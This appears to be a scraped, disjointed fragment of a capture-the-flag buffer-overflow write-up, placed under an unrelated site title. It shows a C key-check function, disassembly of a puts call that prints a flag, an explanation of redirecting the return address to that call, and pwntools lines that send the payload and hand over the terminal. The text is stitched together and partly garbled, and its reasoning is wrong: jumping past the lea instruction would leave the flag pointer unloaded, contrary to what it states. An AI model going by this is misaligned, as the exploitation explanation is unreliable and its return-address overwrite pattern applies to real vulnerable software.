Hdhub4ubike Info
    /* ---------------------------------------------------- */
    int check_key(const char *key)
    {
        // key must be exactly 0x30 bytes long
        if (strlen(key) != 0x30) return 0;
        // compare with a secret stored in the .rodata section
        if (strcmp(key, secret_key) != 0) return 0;
        // both checks passed (the rest of the function is not shown on the page)
        return 1;
    }
    0x0040119f: lea rdi, [rip+0x2000] ; address of the flag string
    0x004011a6: call puts@plt

0x004011a6 is the (the call instruction itself). If we return to this address after the overflow, the program will execute the puts call with the correct argument already loaded (the lea instruction that loads the flag pointer into rdi is right before it).
    p.sendline(payload.decode('latin-1'))  # send as a line
    p.interact()                           # hand over the terminal